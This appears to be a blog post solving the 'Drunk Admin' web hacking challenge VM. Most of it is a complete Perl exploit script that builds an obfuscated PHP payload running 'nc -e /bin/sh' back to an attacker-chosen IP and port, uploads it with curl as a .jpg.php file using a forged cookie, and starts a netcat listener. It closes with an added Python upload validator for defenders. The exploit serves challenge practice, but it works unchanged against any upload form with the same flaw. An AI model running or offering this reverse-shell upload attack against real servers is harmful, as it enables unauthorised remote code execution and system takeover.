Remote exploit for “Drunk Admin”


A few months ago, Anestis Bechtsoudis (@anestisb), a guest at the third consecutive UNAUTHORIZED security meeting (401 × 003), held at Athens Hackerspace, presented the application WeBaCoo. By the way, he told us about a web hacking challenge he had prepared, codenamed "Drunk Admin Web Hacking Challenge". Unfortunately, back then I did not have the time I would have liked to work on solving the challenge, so I left it for when I could find a little time.

Since I found some free time these days, I sat down to try my luck against the drunk admin. After downloading the virtual machine (md5sum: edf9bcd28049ed85312510d5872ea463), I found that two solutions (1, 2) had already been posted, so if I decided to continue with solving it I would definitely have to find another, more "original" way, that is, one that does not use WeBaCoo at all or any similar technique.

So I prepared a simple little script in Perl:



use LWP::UserAgent;
use Digest::MD5 qw( md5_hex );

# -----------------------------------------------------------------------------------------
#  HangOver v.1 : Remote exploitation script for "Drunk Admin" Web Hacking Challenge.
# -----------------------------------------------------------------------------------------
#
#  WARNING : Don't drink and code! ;)
#  mr.pr0n - http://ghostinthelab.wordpress.com - (@_pr0n_)
#
# -----------------------------------------------------------------------------------------
#  Many thanks to Anestis Bechtsoudis (@anestisb) for this challenge.
# -----------------------------------------------------------------------------------------

print "+-----------------------------------+\n";
print "| HangOver v.1 - Run(2)Shell Script |\n";
print "+-----------------------------------+\n";

print "\nEnter the IP address of the target box (e.g.: http://192.168.178.39)";
print "\n> ";
$target=<STDIN>;
chomp($target);
$target = "http://".$target if ($target !~ /^http:/);

print "\nEnter the IP address for the reverse connection (e.g.: 192.168.178.27)";
print "\n> ";
$ip=<STDIN>;
chomp($ip);

print "\nEnter the port to connect back on (e.g.: 4444)";
print "\n> ";
$port=<STDIN>;
chomp($port);

$payload =
'<?php'."\n".
'$a = "nc";'."\n".
'$b = " -e ";'."\n".
'$c = "/bin/sh '.$ip.' '.$port.'";'."\n".
'$cmd = $a.$b.$c;'."\n".
'$dead = "echo ex";'."\n".
'$beef = "ec(\'".$cmd ."\');";'."\n".
'$send = $dead.$beef;'."\n".
'echo eval($send);'."\n".
'?>';

$filename = int(rand()*10110110).".jpg.php";
open FILE, ">$filename" or die $!;
print FILE $payload;
close FILE;

print "\n[+]Uploading the shell to server...\n";
system('curl -s -b trypios=uploader -F image=@'.$filename.' -F "Submit=Host My Awesome Image" '.$target.':8880/upload.php');

$nc= "nc -lvp $port";
system("xterm -e $nc &");

$md5 = md5_hex("$filename");

print "\n[+]Check for the shell:\n";
print $target.":8880/images/".$md5.".php\n\n";

Credit to 
mr.pr0n & anestisb
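
Seen from the defender's side, the script above depends on three things: a client-supplied name ending in .jpg.php, a body that is PHP rather than image data, and a stored file under images/ that keeps the .php extension. The upload check below is an added example, not code from the challenge or from the original post; the function name validate_upload, the extension list and the sample inputs are assumptions constructed for illustration.

```python
import os
import secrets

# Magic-byte prefixes of the image types this hypothetical uploader accepts.
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png",
         b"GIF87a": "gif", b"GIF89a": "gif"}
# Extensions a web server may hand to an interpreter (assumed list).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pl", "py", "cgi"}
# Coarse polyglot check; re-encoding the image server-side is the robust defence.
SCRIPT_MARKERS = (b"<?php",)


def validate_upload(client_name, data):
    """Return (ok, reason, stored_name); stored_name is None when rejected."""
    parts = os.path.basename(client_name).lower().split(".")[1:]
    # Inspect every dot-separated part, not only the last one, so that both
    # "x.jpg.php" and "x.php.jpg" are refused.
    if any(p in SCRIPT_EXTS for p in parts):
        return False, "script extension in file name", None
    kind = next((ext for magic, ext in MAGIC.items() if data.startswith(magic)), None)
    if kind is None:
        return False, "content is not a supported image", None
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return False, "script marker inside image data", None
    # The stored name is random and its extension comes from the content,
    # so nothing the client typed reaches the file system.
    return True, "ok", secrets.token_hex(16) + "." + kind


# Constructed sample inputs (not captured from the challenge VM).
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_STUB = b"<?php /* stand-in for an uploaded script */ ?>"
SAMPLES = [
    ("4711023.jpg.php", PHP_STUB),     # naming pattern used by the script above
    ("holiday.jpg", PHP_STUB),         # script body behind an image name
    ("holiday.jpg", JPEG + PHP_STUB),  # image header followed by script
    ("holiday.php.jpg", JPEG),         # script extension hidden mid-name
    ("holiday.jpg", JPEG),             # legitimate upload
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        ok, reason, stored = validate_upload(name, body)
        print(f"{name:18} ok={ok!s:5} {reason:34} stored={stored}")
```

Serving the upload directory with script execution disabled closes the remaining gap if a check like this is ever bypassed.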
